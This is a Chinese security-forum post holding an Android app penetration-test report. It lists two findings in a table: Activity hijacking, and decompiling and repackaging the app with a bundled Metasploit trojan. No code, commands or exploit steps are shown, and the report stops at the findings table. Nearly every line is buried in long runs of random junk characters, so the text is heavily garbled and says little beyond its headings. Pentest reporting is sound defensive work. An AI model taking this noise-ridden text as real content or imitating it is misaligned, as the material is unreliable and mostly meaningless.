找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 原创-app客户端渗透测试报告之反编译捆绑msf马二次打包 ...
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 5292|回复: 0
打印 上一主题 下一主题

原创-app客户端渗透测试报告之反编译捆绑msf马二次打包以及active劫持漏洞

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2022-6-8 20:32:44 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
q" v6 } x0 \* e$ X; H' x7 S7 K) ~8 X: [) |! D7 h/ d

5 T- m8 ]" Z4 L; f: P ! f+ ?+ Z8 h6 Y E/ v% N& O
, a- e. S+ {5 H3 W1 V* w' q ; K( v' F+ d/ K

# Y% z8 R$ Y* s" Y $ j6 X+ I6 D, x/ ?, \3 h9 i( c
4 W" u% h. W8 K h0 ` , Y& m% e# u9 ^# z- a

9 [7 D: O% K+ C) j3 d% F! n1 s* { $ h: }; ?- X5 s/ P: m# T8 E 文档编号:                ! s; I$ f* H1 m* j" E% t8 x3 c' Y4 M+ R; _7 K' Y

" t* b J2 v& v8 `: L8 n6 w - d( X+ b/ T) D8 {

; b- c* M" u$ A6 W; g) S+ D $ H( g- m* Y. `+ h! ~' [   , W8 T# R( g# B& @% @2 i2 ] 7 T4 U: T& u7 s( U' T

0 u4 u0 Y, i9 V; F / V8 M* A% |0 z

* A) v2 ?0 i4 x5 e! _# C% Q$ ]2 W" p1 L6 Q   7 l5 K0 h9 w* h! M5 C9 j$ j 5 S* e- p5 c, M

5 n! L! F* X' N2 d5 q2 b! G+ {# K, {) F$ o$ c

9 |; X' X5 ^% O# t4 T $ w/ |: |! l: C) u   3 W+ t3 c- f. D6 c3 p+ `+ z( }/ C

) z6 j$ D c" V! |* Z 3 A$ C! f2 n, l- I S! o$ O

1 T' n) X* }" l! k / b2 z8 V$ ^4 t& M5 g2 d4 j   # L5 i8 G" _ T; J1 K- h + W* \$ y2 Z; [3 F! |: g$ ?

; z$ ^) R Z* y" v* v# y $ W4 c. p5 @, J

2 V6 q! g# D. z G% y/ c! q6 ? 8 Z6 U! ^. \7 n/ U   + g. F* S) n: Y: Z0 k" w1 u 3 x1 s, }, V8 J

3 @; L% W, G1 o % K4 j. n: F3 y# _

* k0 c4 r2 m7 e7 T# g & L2 m" E8 W, ?. a5 A) B5 w1 T# ~ g 某某某APP渗透测试 l8 q. F5 ]8 s6 t0 l" d* _# [7 R- v( m

, P4 b- v& q7 q8 O7 ^ 8 F5 ?. L) @/ x" {6 K

# R; g8 O- n$ }+ P2 t 4 L$ x0 n" F/ H   3 x8 Y! ^3 \5 l5 t; R 1 i; G6 Q5 u4 ^, b

6 i* g9 h( X) E6 j6 z1 W; X4 ?" z 9 s" h8 i# t$ J5 Z( J2 ^2 U7 z

# F" V) i8 I4 Q+ | & T( }0 A9 I4 S   8 ^: v% C, {' C + E0 J# P& ~" v0 i

! m7 ` f) g. M: ^) V 2 }& _+ Y; w" B/ c2 h& B( K t5 N

6 G2 s( T5 t7 X9 B- ]2 c) x/ W$ R+ K! i. s9 F   8 m3 |' z+ [6 S$ ^' P" Z4 i" s; _5 q' O, C8 i

* X: q8 _, Z) p. n$ L( r; { 3 O+ Z) x* P0 Y' w

( P- T3 c7 ]. n% C+ B9 B: ?2 v 0 W( F% G, `; Y5 w; y( C1 i   0 a4 Q$ f7 r6 }* A* T5 _ ( b4 F( _2 Q$ `+ Z0 H' m! \

5 s6 u2 V$ @+ ^. R . {# E7 \( K, J" x% L% H& J* `

5 E* @# U8 T9 l- c3 ]9 a 0 c3 M- o5 T+ ^$ Q% h 技 术 报 告 * P9 s. u% R' \' F: L4 j & Y" K2 O. W0 c4 z

' u$ a5 f* w- r; T, q7 ]* |3 Q, k2 e

8 U* t8 r5 L& U# w' i( x7 o0 {! X4 q9 C; l$ r& u   ( C+ @- x9 W }5 v! F2 o$ r - \6 |9 ]' M# S; [: q" V) y" G5 e

* x/ i2 S$ z0 H( G( }1 M& q" w- W) E, \2 r2 s4 s6 g) v1 w& b* F

& S0 A, ?6 W3 H& k! w0 n- l" d1 T. ]5 T2 j( ]% X   4 f$ ~2 w3 e& C" Z# a4 Z5 y$ t, d3 |5 a' T1 X7 s0 {

8 {4 t! @9 Q, ]4 f- o * p. Y: v$ s5 p( P/ r, \, ~( X9 c

, }* h0 Z6 E4 t/ a' B* h 4 h- Z8 N/ [! F) ?5 q. q   0 p1 }- b ]. Q. M , @& `+ A0 @) d" L

, q! K* g$ f, ? D# { ( m5 c3 C: | z, s- ]. J- a5 n

9 X% l* Q, r( y9 g* s" r4 t, m& |- {* a: l0 i   # ^) C$ C5 Y- o+ k: n) ` Q% q2 m( {8 r( S6 r) I4 z4 Z

: L! F5 F. l. E+ F" j # w6 a8 t( w/ i( ]3 w+ b; i, W

8 m, X3 X _" _" G5 H& b 5 U. m1 {. ~! X; [0 d   W; z3 M0 s9 H& W2 [3 e: K+ q. g7 {9 r* }6 F) B. e# [# X

- M" E2 A$ q( b' e0 g4 I C1 ?, w! p2 d: k

) p% M1 c* I/ C/ {. W2 z3 w2 i! l) c$ b0 ~# ]+ Y3 d2 ~   3 n& s) l9 X! M X6 _6 L( U. N( n5 }+ u; @

! V* Z& a" _- B$ F3 p 9 J# J2 t& U/ @' b# z9 M0 Y

! Y9 a0 W) _* g" P* F: B! T! W6 s4 a% s! ~. N0 J' j: U( W   ( }3 A% p$ h) a # m, M& _- S$ h2 N3 C# j

$ j3 M H- `) ~+ X1 {2 A( b6 w4 I$ } 5 ]. G3 ~$ C1 V9 Q- t( X' V7 K

: ~( j! V0 W' U: M ' M; \4 {1 h ^   # A# }/ Q! G8 q( N$ R& e& n ( ]; C* R0 { D! r. o) o1 p$ C

7 H% S4 @: [+ v8 u+ V ! P. |# S/ z; w6 [# b

3 B/ |) `0 M( u/ a , H, P* R' ~% S: `) Y& h8 _% K   ( M3 `! i: Y- C$ B* N; F, ^: X: U" R

. U9 C0 T w& {* |9 C2 I ! n l7 Y( \9 ^" F

" v0 ]% b' l& L & x" Y6 h9 N5 s5 V; f1 K   K5 E$ Z$ R4 N* Q# e, s) S5 T9 Q# P+ M5 F3 d

3 R. v/ Y) j p- E5 P/ @0 D+ D9 R- i& Q! ~. Q3 Q) U# B- t; F& s

; X5 {3 [4 N, z: j/ h( p$ c 7 a5 Q% Q% E8 e6 Y u   5 W5 E2 Q* _% P6 A, v! B6 j/ \ 3 d, J1 A! p2 L0 u

$ A4 j! O+ R) B3 f6 |9 _& r * N& S) _* ?$ b# ]" v8 e! x; {6 r

2 }$ ?) q7 X% b7 ^ 5 b4 V0 L2 Q) e   5 e. q! m8 m9 ^$ C: Y2 `* Q5 M9 _! @2 W; W. O, g: x2 Y& ~

8 A E; O0 z5 d8 v : W A3 a8 G+ G6 X2 x2 s6 c

& z) M: ?, P: w ! `9 `* N* N: U* x5 {, W   . v. X% K# J; L5 u' H7 h( U; _# k# v+ g# n. g! Y; h

$ C' I8 n# Y3 e K T/ M) M. i 1 N0 K+ |, c- M

+ L: x6 S* O7 f8 \& ?4 H8 |& E5 h) L6 k   # i: f$ |6 r" r$ J' ~0 D2 Y ) ?! w* ~$ Y- X! P6 z

9 d/ l8 \! N9 Q( J) ]8 y$ @, {& j+ n. C+ J3 o( c' J

; v1 h0 ?7 n1 \0 U+ ]$ W: c% T4 F, x' a7 U1 h ?6 B   ! c% D* Q" j& I5 M/ ^. @9 [ ) a$ u; O: M6 ]# Q- o

. i! O5 @0 M% h0 @/ a6 z ! }) x* Y# M I3 F2 c+ `5 L/ P$ w

9 I! y7 r0 L) |3 ?( D3 X 7 m- @9 t8 {) d$ g3 q/ u   4 X: ]% p3 h$ y6 V( B" R' u+ U, K ! ]# f" W6 l& W! R

' @; z( \# D. { : v, T! [( i9 v* i H/ Q; E$ A( V) C

& U& o" T5 @8 l) H9 `% u2 a+ _; c+ Q" z$ {8 ]   5 ?/ q5 `; x' m; y, ]0 K& ~ y ! R" q. d. @& w6 \$ S" A

9 t8 L0 x S8 P0 |' G3 r8 \3 D% m8 G @9 L. {& q4 A9 ^( Y

, i* Q% _( K; T# b ( S9 b6 ]( F8 y% g! h5 N   ( D% R+ x8 _; q: \9 P9 D; X , D# F2 G5 J- f) P5 \& N+ Z

! I0 h! `" L+ [7 v& J/ N# H6 @! L, U( F! ~: L# a

/ B4 F% S( f; a2 g - ^1 f& p( f! Q- S( z$ b 二〇二〇年 9 z8 i9 _' \6 W4 A ( B6 k! s; k: v' y0 X) b; e

% O7 ^8 q7 o, C. h0 b5 X2 T0 z8 f0 i" C+ p
6 n, Y* e0 M% O6 R8 j# o! W+ \: I2 h% p8 i
! e% j2 A3 |: g/ I2 A 4 e$ P3 P4 Q, h3 T" { 9 R# O6 z B' Z9 D; D' J6 r/ ]9 C8 t5 e3 q
$ ]0 c+ {# I# g4 D- j ' W( T5 s+ f U5 Y
+ q- D y0 t z% P' B8 i * h# S; M2 u6 B0 {/ u3 K" n
' E* j5 R% D2 d+ \" R7 }+ J+ s. Y6 B9 p3 N& e" D2 H, t4 T + g' S; h3 d, P& z9 [/ ` 5 Z7 }1 @& U9 w) ^/ u
( I$ i6 c" i0 S2 Y$ k - j" l1 T' X; o5 r

' z: X0 s" B! C# `" ^! l : {( e# H: Q9 m; ?5 i# F# [ 目 录 % a [) K& l$ Y2 O' V# Y S/ K1 j2 b. i

( t* Y! e; O/ `* Z ! d8 R7 u- \: f1 E+ R. V; F3 G : A6 h4 v) {. m8 f( D/ B * ?: F; d9 q; b! F9 @

/ K; l9 H8 m/ Q# N. g V5 a: I2 M% J3 x) Q+ Z8 l/ U   $ ?8 A6 o8 R4 r/ V& y7 \& x5 W ; W% l, O# C" y( [! j

6 J1 J# N5 b, j / a6 ^/ b: T9 d9 w# s

' ~4 P( V' p3 }& s1 N' M ! f$ }+ G% Y: M5 x0 i7 @+ D 1 概述... 3 - x' H3 j, R) M9 b- K) ~- i# f/ ^8 B: T6 ^" S4 |

+ |& d/ h2 D7 _* ^% ^ 2 A& M& s! y1 s2 }& b1 D

% a+ h* q) O% v$ D% I8 P 3 A% o; _6 I2 @" z9 Q 1.2测试时间... 3 3 P! C1 k, c! [; Q0 T9 _0 v h 3 h; o( E! R; A9 O

* g8 O2 s1 F" Z2 H 9 a( }6 H; _; @# w1 L2 t# r

# P4 c5 u6 B# j j7 i 8 a7 O3 W6 i& g0 S+ h; i 1.3测试对象... 3 / g& \2 L! ]; k' f . i: s- D' r' t' v& V4 R. g. Z1 ~" X( Y

2 [ T; ?* ^7 @% `& ]# H" a0 v + C' t5 k4 ~' k

- f( C4 a$ j1 C) E2 e % t$ C# s$ U; L( [: W+ B5 J5 q3 b 1.4测试结果... 3 ! M& S9 e! X& l2 ~! I# f * I2 [! A/ m* ^$ l7 y

+ z: \9 o1 ^0 [3 q3 { $ _* p/ C# X7 P6 R: o: S' U

2 N: l2 r2 d2 J D+ u0 y - V. m% G9 v+ W+ n# a 2 检测结果... 4 ! B3 E0 h: B/ l+ o% b & p% H9 |# O9 U

% y# e4 M! ]( R5 u. b7 o3 T3 H# R+ x4 n! a7 f1 _+ G! i

( e2 i# Q9 p2 T- y, g; D' S 3 q3 h4 I' k2 O% K( r 2.1 某某某... 4 2 Y. ^ F+ R$ C! m * f1 G7 q$ @0 N2 |7 ?; |

% `. L, N; C& y# j( p4 N ~: n " \6 N6 [1 v! C% f# e9 M( @

+ T6 B$ |- P& a # f6 ?6 ], ?9 L0 Q 2.1.1检测目标... 4 0 h/ z% b; j4 @2 i 3 M$ _# Y- ]/ k R# o; }

! Q: {! d0 H1 q1 M5 K& K, f* Q9 e2 G) v1 n/ X- q

1 Z6 i; V7 A" \6 C - F+ O. u" j! j, L+ o 2.1.2检测结果... 4 ( X- `3 ]* C/ H6 S' z, r # W/ H7 n% `! {7 L

6 D5 t8 z+ u& `0 S4 \$ Y2 L4 X$ U8 d) n9 O

& A- X" w B, w+ Q1 ]: j4 l $ }! S! R9 e% Z 2.1.2.1. 4 ( f4 ]: W- ~9 n+ ]: p; U0 u# a / a2 Y7 }" _! Z( Q. [1 F1 n2 l4 i

7 ^% _# t7 }% Y! O& |& d; L * O4 [6 S" q/ i% ?* B

; Q/ V. W4 O* P C7 n. ` . ?: b; a; |0 {: p/ {0 d% D* F 2.1.2.2. 6 . h# {$ z+ U0 \/ p$ Q : _5 g" B. Y% Q( A

+ D3 e# {; X& o; u K7 u( X0 T 3 ~; g4 x1 M3 l, O

/ t; ?% n4 p5 ]) y3 u( ] : ~& ?8 V0 V+ c) ~+ z 1 W$ ]# h) D" |; { b 3 H! m: k+ W/ D2 J

3 b7 f3 p* }! I p7 R' H 5 C( Y" ~+ u# m5 _0 Z1 z- y$ b+ t. y# F9 f 5 N+ g& N' S% r6 k9 ]( T& S; D' _
% X" a& N* L7 j1 o5 d" G2 d- e3 H
! o. K& T: F# m2 D $ r% z2 o5 B0 P ' Q8 f5 q4 o! p' y: h % A" z; d P+ b, ]8 I

5 M1 |9 t1 {* t0 Z( J" F ' ~2 b. \" \- E9 ^ 1 概述 1 g6 @1 T" `0 Z7 D2 }# V5 u8 w. \ v9 A* q# x

1 E- G8 O5 d1 G5 I# W* M# p0 L. W# u+ ? x4 Q% A" p6 v

3 o% o* I- U/ S9 O9 v/ |8 c$ l9 Y 4 V2 Z2 ]8 m* ]* E) A1 Z( W 1.2测试时间 6 r" ` i4 A% `, K. r6 _8 n& y + s' x& I& V$ L9 G

6 c& b o5 o. v; Q3 ]9 E! n 2 ?& `% u: U7 K + E8 Y( F; A: }; y; i* q. V4 Q3 r8 b2 M$ G2 a! A1 X D1 L/ f0 G/ T/ r/ t) O) y4 R9 j- |. F3 w$ w$ _. P8 P: R1 T M$ _- H' m( B$ |2 N6 t# Y) c" u6 P+ x& h6 I2 y6 a$ Y: }4 _: s! V7 ]4 U( q6 M3 D' h8 a& ^8 ?8 B" F4 d# \1 Z0 c0 L4 M7 u! ^% @$ Q$ Z; u! n7 ~% E* Q% D% f$ D9 b. @+ f: S1 N# v+ @$ t# Q; d/ t! V* v2 b) b, e/ Y6 E9 U/ a+ M7 B, H5 |+ I m+ @, A0 d5 U/ z. Z% y5 S8 a2 v4 Q" y [8 F3 T" @' r. h) ?/ A8 x/ M( E7 G; O$ `# M/ ` t# N6 E; N3 m c6 W4 f& c: u: b! U5 A- b2 C- E" t1 |8 c: R# r$ J0 P9 H( L- J. O; C' n% X3 a* O* W3 ~1 \/ d9 d1 U9 ?( @ O `$ M4 G# n, x: E; D$ ]1 c+ ~4 ]. W" z4 d- i8 X$ t9 U2 y. p* V. i ]* q; Z) {0 p; s) A7 |0 k2 s# w) K ~4 c4 j* H: Z* J5 X; V- R' J2 p
, t: ?7 R% a& k0 [ U : J) U, y3 L0 y$ g) M' X' J

5 Y$ c5 c4 Q1 u( L+ b! D4 u . Y$ o# Y; r$ U 渗透测试时间 0 x# R. R1 Y/ p* l) ^! s" c* U2 S# y. d R) E( Z* g

: s! L* D: s; p4 b$ ?2 O# W; P& j/ _3 g
% ]2 q! L& R% d3 Q( W1 k h C3 Z" y6 l. o5 e

1 O7 D# `1 k! R4 Y+ K2 ?# g$ Y$ A T/ ^# f# J 起始时间 3 X1 f9 y1 l, S* T% K$ I! e " Y& [' I7 ?' t( y

2 Y! W; f, |) z6 ~4 H& u o7 d; }/ d6 A# w 		' T; }& H9 f' V2 U, p3 }* T3 Z0 U / P5 e! c0 r( r+ j; `4 e0 n

9 j! @) {# {4 ~ ! j/ ?/ |7 o- S | 202046 2 R/ w2 j) K1 B# s# ?2 T; u ) P) N. j6 Z W2 Z5 k- H4 `3 k7 |

* m' F ^/ t' v% y0 O) g8 S ; l/ d1 z: T/ L: Y E" e
/ Q2 V* P* S% I4 D: T 3 m: f: `3 d0 R; ?' T4 y

2 c3 m2 _7 C/ r4 J: t & d3 P) L5 B& ^ 结束时间 " K/ a+ N+ p+ D* w$ f , \6 p; F6 m% ?; j3 P+ F0 K

) `% W( w, K1 m9 l% A' s& W) h6 T7 p" B" ~9 @# l' N0 i# p 		! X% B p+ G2 m% {: U8 |0 Y0 z. a. }2 S2 m$ G

! c' ]: v$ C* T& ~6 _' }9 ?% q / a5 J' [/ x7 ?' E 202049 y0 m7 k, Y# y: K% z 5 f. n+ B8 J9 G' s

) P9 [0 U& O2 K4 P, m! B 9 g5 T& |5 R" f
7 m1 r- Y( o- I4 t, N" U9 \' ]# _3 m$ r1 R

$ g* [' U0 @$ v - ?) O& @( o5 p j5 ^5 m: v0 A2 e2 Y 1.3测试对象 : d- k' i* b4 j 7 @8 t$ O0 [4 k3 u5 N1 S0 \

( [0 j! H# N+ p" P 8 r9 |$ f( o1 A1 M

0 D8 ]6 l! `8 c8 ^9 v2 ? 3 A) Y, I" z+ F9 @9 C' | 此次测试目标为某某某安卓APP进行渗透性测试,APP存在安全漏洞数量如下表所示: 8 u9 u8 ]# E9 |6 S! V, y3 s 6 v, z5 Y/ |7 Z

, i( ^( Q9 k8 y( @$ D % R1 ^2 a B/ b' q: I& `6 n; L

& c5 `: v! L& \/ c3 L! h2 B ( \! G' k3 l9 k! H/ J# ]. t4 z. J 1-1 检测对象 ) {6 Q6 M+ i: B' B ; z' F0 B" T* A

a! r. L7 |' L( o/ s. s( h" f }5 t4 ~. X. ?7 P: P 7 J% Z5 b9 |! o" z x, q& l/ q* F% H( s3 X% f8 ]8 N7 Y" P/ s' @1 J+ J' m. ^* c* _2 I3 I) \. w5 |- a- t' r# ~1 K) E9 `$ F) y4 \* X/ A" P/ M6 q. W" z7 I5 M6 Q/ f1 u z" ]+ E+ I. Q. j) x/ e2 M7 g) \. R' Q' t. Z g! V2 N! S" V1 H- n5 D% y: N8 H. _" a9 Y3 k8 D) S9 H1 x1 C. h4 }; Z8 _, x; b+ z% T. _0 O. I% q( C6 U: E4 K; O/ f5 X0 o3 m* n% i0 S$ D2 t5 a5 b9 D1 m6 q" K' F! t: K8 d; N5 m3 }! {! L4 E$ O3 |5 i0 j( `2 s) e+ K! N1 V3 Q+ X$ X0 e' g" N! _. O3 v' d) o. n+ z7 v3 X6 r5 V, S6 y E3 n, n1 [" {5 g4 X) R& X% P& G4 E. z: P* H6 M0 ^0 i M+ z3 {- A; B( U F7 C+ f3 n) U& N a( A: O c2 `/ {5 C2 E! Z, x5 n, A: P3 r9 d- E+ A5 y1 U" c4 {7 W% n# v! {/ }3 B) t9 B& B+ H( x' a: {# M5 [3 Y" _ J: F6 _% c3 C# ~# J3 _
% v8 d- {& x2 r) M ( ?( c8 H6 ]9 [% Q

2 C' U* w8 v) x9 b- a ! v) F- v5 S5 c6 O 序号 9 ^2 }5 O3 m2 R. |+ [& O 9 P2 L v+ c- J6 }! o$ g: }

& {: D) u, N0 m0 w& J) g$ c9 Z3 F# e- m% [% j 		# a1 F' G! x/ K8 a, V! M( A * y0 [0 x8 o8 l3 ^" F( u

I0 t; K" S7 ]2 r % y+ r8 I8 q5 ~ 测试对象 0 G6 r. C+ l4 y' j ) m+ b& g3 T; J5 x5 m- _/ g8 ^

4 U- n: b* A+ l' W; H3 }: h$ l4 v1 ^ i9 o 		$ u7 w6 a" O" B0 N4 G* K; ^: v. {3 Y/ X) X8 m0 n4 ^: Y

) ^. I/ H+ h6 {$ V$ I( n' `9 K k" j: z+ _" { 测试地址 5 L4 s" L+ ?: a7 C 2 q: E' H( X7 Y' X

7 q5 m4 K! Q3 K8 l/ U( L1 b! m$ [2 D$ |) g 		; o( y- a1 A ^; L- l6 t! ]( z! z3 [- u# s, y0 E2 t2 B2 f, f

* P' @) v8 E m0 \8 X5 [: p; p/ h' W* ?$ ^# P! A 安全漏洞 - ]7 i3 F6 h+ ~ M9 N3 x: j h6 e( o

( b: L |2 g9 O/ D* l 8 ^3 J! `: Q3 g
, y# s) `3 I0 D5 A4 O5 L! T6 X+ l+ ?! Q% P. F# E

( t0 O4 S* `% Z- O9 F3 } ( q; ]! q* A- W) g# r 1 " J9 ?9 [' q6 E: K4 ]0 G: p1 P ( L: ?2 o9 z9 t4 J" O- Z

: z6 z6 l( N4 Q( h0 r1 Y+ Z1 D" K- M2 x8 c" i; i0 Y: e 		4 w- x2 @: B9 O# q 9 Q; F/ D% L U* M7 O* |. @

: B+ ]) o$ \* [ Q3 M4 _% h- x1 Z. H O 某某某安卓APP 0 E' C# H& a0 K! h2 q! q7 j ; `* G$ Z9 h6 `2 H7 s; ~

* |* A" V. ^2 n: W* X1 c: i: J% |0 d" _( E 		' Q" X3 }- O: }8 \. Z 4 G! V& H) a, Z$ \; _

$ _: @9 c7 x# i% E) }' A& j5 N8 ~5 G0 V   6 t! l2 K. Y* X! ^( H, [! D H . a0 S# @2 S& l' Z

% ?0 \, \- j+ N J! e! X 2 O( w8 x# z; H+ ?% l& Z; Y4 n* P 		7 u$ L2 q* y8 X* t* F$ g! q * L1 T Y% v: c' K9 V

$ |6 f- F2 T6 R+ g* d1 q% I$ Y7 N1 h , k( P/ \/ P9 e0 h 2 ! l8 s }) z0 [3 x. [/ l9 K- y - \: {7 p' w6 N+ t

! l+ Q6 F" `, y8 X+ R/ e0 `! F ! f, ] Q a: [' N
/ R) v9 ^0 p6 u% _* h+ Q: P , |8 r. j" c$ C" Z# U/ p. I

* S0 P1 ?, t5 M9 t3 o; f2 Q+ t0 `- C/ o 1.4测试结果 / O; F( }; W3 c# K4 l, F b1 J/ j) G. p% H4 o

I6 I2 J& t& ^4 O; w3 Z; I . Q' p5 Q1 ^' X" }3 h7 n

3 i5 s9 m; v, ^( G ) w: E( I( \6 ^, g1 N8 `5 M1 ]& F 在本次对某某某APP透测试中发现,APP安全防护存在一定问题,主要问题如下所示: 1 _# ~9 L" N9 I/ N , t% I7 z3 D* E; g

3 w% \/ l$ I6 r0 D' R& a 5 S* D; D- u9 Q% H9 K

: ~ z# c1 k& A& O : D+ `% }5 {& a3 p   $ N) C9 i- t+ [: Q/ a; N2 y P 2 n7 P' |6 D# H0 p

0 l& D- N& x4 w( U* R + J3 o! t$ T; U. E: y3 Q
8 H- y! a6 \2 ]% e0 M* s $ t; g; M2 h2 F+ W7 n8 x4 K2 v/ Q ! w7 G: C, H) N5 _! s* d0 G1 D, x+ d; o. \3 V+ L: B% {1 r; l% f: v' m7 W* _* m: D" @: u& C! ]. L* ~5 j; t. O. d, R0 E9 L" x. }; M r* }! b, P4 W1 M% l2 L2 t7 W2 ]4 o$ ], E6 B+ q4 J6 |5 Y. R: [: J; |2 [# A! z7 J6 P D3 x( Y. d* O* M8 n' T' k8 I* e. `# m' U. g! r/ x, s) g& V- O$ l: m2 O& O2 ]7 w( B# P$ M, T( p- [* Q$ G( i& e! T% p' h9 A' V2 u& |; H9 w! E1 ^* u6 g1 v2 Y% e( i1 Y7 t! O( Q, E3 u6 x' X5 G8 V2 J. X' |4 I2 M8 m$ s9 X: z% o0 l z- m& Q# G/ a# Z" v: ?* v+ j7 j3 E X1 P. }. p4 m6 \, q9 [5 o: k! ? I' ?, Y" I! E, ^# R, v) ]% K! F( T8 v, ~( H) x3 }) E% |7 U! i& L {8 `/ u' g' ^, C8 B, w* z8 A3 \5 O: ~4 j' v/ o7 N& D6 M1 p2 Q+ h0 n+ w6 B3 C8 I1 q1 L f9 r2 e; c: J; L D3 _7 w8 ?- Y* h7 r3 j2 a0 a: a, I! W- Y% Z8 m0 X" ?% {3 {9 h' `7 I o" ~$ I) W/ a4 ^6 h+ k& C* ~, r4 M a8 w; C% q( z9 e7 E6 J4 I! C; F3 h3 ]5 V: W- ?' t( U' t: J) l5 Z1 q$ D( b& W" w# \, p, g4 v8 ~2 C. r+ Z* y4 e8 n- H7 l, D$ b9 I1 {7 U+ T6 J/ h- p. Q% V3 [. x$ t2 [& E+ {, t* q" @. j3 B- i: ?$ N @! `+ d" D f& e2 e2 J1 H V3 [+ {. k9 p' R; q" g1 \' e2 }/ u" C6 \+ E2 m# h0 x, [7 G& S+ E7 c5 U7 y$ o; e" q" I5 B- b+ p2 p8 ^& r' Y e. D+ K( J3 t& R# a4 E
: T5 p2 {# p! d$ d' L, z $ u/ w2 v: I% G$ r( ]6 a2 K- T, k) l

# R/ _$ {+ K& J+ T7 ]4 D 3 b8 o1 o. r6 D% ]% B! c8 u% L 序号 / E& p+ C2 W' T7 I& W 8 ~# K! D2 C) V$ ]& g# Z, o3 F

9 ^) A0 W) C. O$ e- `/ W. ]0 N9 G' s 7 l/ a( b2 \% Q/ Y) z# i 		& Y6 g6 W0 k5 c3 E4 ^4 F. I 6 l, b! c, _9 Y! k: i. h

* L2 y$ C* f8 Y. _) Z9 P( p0 ~ ; u1 y' ~( X# c" `3 K 系统名称 # K9 {$ T: t- z0 l# H! W$ F% X& U9 I2 a' p$ |! L! F' B

# k- F# Q# J/ {* \2 y( t 7 y9 ]. f" j1 z" K# a, u 		$ ^: c7 d; _# I# T+ G ' [; j* D& I5 k x) a

7 Z: P0 f, g- A L: i& ?0 D W* k( u0 n 漏洞名称 ( y( g3 {; L2 G3 Q 8 [' t9 b- F8 O" T1 z8 ^8 s0 w

! u" s$ \$ R6 s3 @$ G2 N: c- \+ q ! [7 }- F: ], T4 i 		# I6 }, m0 M7 B9 `- F# R/ g0 C, d: [ 3 h2 ]- v8 I o3 h( d

! Y8 t6 h2 J. C( Y( L" m4 v 0 v9 {2 `4 \; O$ A9 a8 }# O 漏洞危害 - h' ?) k6 A0 g: ~; N& l, Q; a) C9 z- P* a/ @7 Z

& y% g! o: G2 t! B2 U " Z) [: c8 b1 @" A% Y' T* A 		5 C6 n4 T% {. B9 U9 m6 \8 g 8 x1 B, ~$ q; I% x' }: b

, `+ L& g0 a% Q/ O( S % F; D( o/ K5 U 修复结果 ; w* S# D9 u9 O0 U3 ^* c7 }* o2 }" t2 O - N9 [, }7 h/ X8 Y

, W& h8 _+ ^& M/ f& Y7 I6 q" }: H / n6 v4 E; ?0 d: o. }3 @0 S/ F# @
3 z0 }2 v6 x: u+ E$ u* U : H2 O7 f6 t9 b

$ {, d2 B! K1 u6 w) z. t$ a. V9 N9 ]) m" x, _" A1 O c. n3 b 1 1 H W( l; k- r } G, u 7 V* X: V2 n P5 K2 F6 {( K

; u- v' P) U/ y/ p2 K0 z0 E g7 O 9 M- B: o0 \ W1 c 		+ Y1 Y# {3 j" R. f$ L , |6 @3 O& t$ S$ D4 ~! P. Q7 r

2 R6 |# t( f4 ?7 [! W3 f0 C8 N % H6 P2 Z- o; ^( i# r- G5 t 某某某某某某APP 1 o* j$ F M0 t. _7 V $ n$ g2 Q$ e; O, {

: u' g+ |0 ^8 _$ f! o* p6 E/ `1 W& T& ^" p) Q+ { 		) S, w" f" Q$ Z, U ^3 {: } 4 n, l1 O) n) r6 u, j

( e( b4 Z# w; |+ O8 c" n3 F1 ~- F n$ q' S4 m4 O/ u ? Activity 劫持 + w$ C& P: L; {7 M3 A ; ^. L8 ~2 G- r( q$ ]- \

) L* H# T2 T4 i( q2 [ # X! I6 ]. W3 l

, p3 }% a) N, p N8 L$ z. [; \3 }% z( J) {0 A( W# H1 p   % |7 U, {- ? ^! U7 k E2 ]2 j! P& D1 ~6 D" M2 W, U2 J

4 K t( o4 G# C8 i' r1 i - _# r# B! g& q4 |0 [; |- b1 F5 C' x 		2 j, {# q0 p2 I; u I2 x7 I, l& a* ]. l, y3 B

0 B7 S1 |4 I7 q - w I/ l& W5 j, J- k# Y0 g* C & Y( T j' R" G: W + ~' t% h' `% M9 G8 [2 p

; w: G% |/ S9 Y2 ] 0 V) b% a1 B [ 		; ]; x, Z9 H# ~ v( a7 k8 ? % H# D1 z6 P6 h! t& E( O) W: h

7 i0 T; e, w$ E5 `# J q7 D& x. U0 C) U/ C* j   |: }8 T ?7 m* ~7 h+ \ 3 |' |$ s" g. p5 ~3 R- ~* T

9 m( j: V2 m& \2 Q6 S. k; x( Y $ q0 [$ P0 x. s9 b" v& r# v; O
8 V8 E9 U, c- t* n 0 S# Y1 Z$ k6 [ v8 v4 H1 {! T

G; ]" i- n+ v7 M, O" {* k7 O+ ] ?, J( e3 P9 c* C; g4 h 2 - }* V2 U/ J! D Z% o' y 0 W- O7 S* ?8 I

# z, t( m a+ u4 f9 J + D9 V5 y0 L& J' j- `1 |( o 		& q* i7 n1 f2 ?( q( A% E; `; C$ t . X; Z$ u% d- w# q' n3 t' e

9 [9 S/ m- X; `) ` , F% ?+ i8 V ?/ L 某某某某某某APP 6 C7 B m( I6 D: s : x% e" ~4 m6 X; j+ a

j) Z+ C7 |; B7 `; L+ z; q! |9 S7 r/ B' y2 z$ y1 f 		* t @9 s% l: V2 K' g# N ; C' }" C1 C0 ^" v* Z! s

$ i3 B0 J6 h+ J2 O! R5 m. g. e" j 3 n* y& F9 X7 x7 z 反编译二次打包捆绑木马、篡改APP代码 ' A2 y ~/ q2 S; Q$ O7 E3 n* X' g 9 e: Y* J e# h% \6 t

6 W% q4 M4 Q- S6 A. o6 g" C5 }8 R8 H/ p! x* Q6 N 		! J" X% E1 [" p: i% Z) ^ - h! o! ?2 g6 d+ h

0 F& R: N+ [" @3 P* I. J& p . z$ o- {3 P" C8 i& V7 V2 D& q* y 1 C$ a! x# k5 N% R. l1 L: }5 E 1 g! W; }9 m y' A8 S( _

b3 }. Q* Y: J: T9 F ( s' r y+ z: z- ^2 a 		: [# a, g$ A6 h1 ~* N6 o/ ^ 6 p8 n; H& p2 n, d+ U) t$ x0 n

( _. t7 U3 }5 o) ^) z+ I " \) b, G0 D6 {- N; O& H$ h   8 I* T" V. }7 ~1 B. u( S/ z7 i- |

( D% p3 G: A! w3 w) _ s! S% ^$ R: c$ u
) q2 b- u& k' q. j: g: ^8 I2 i2 ]3 K1 a
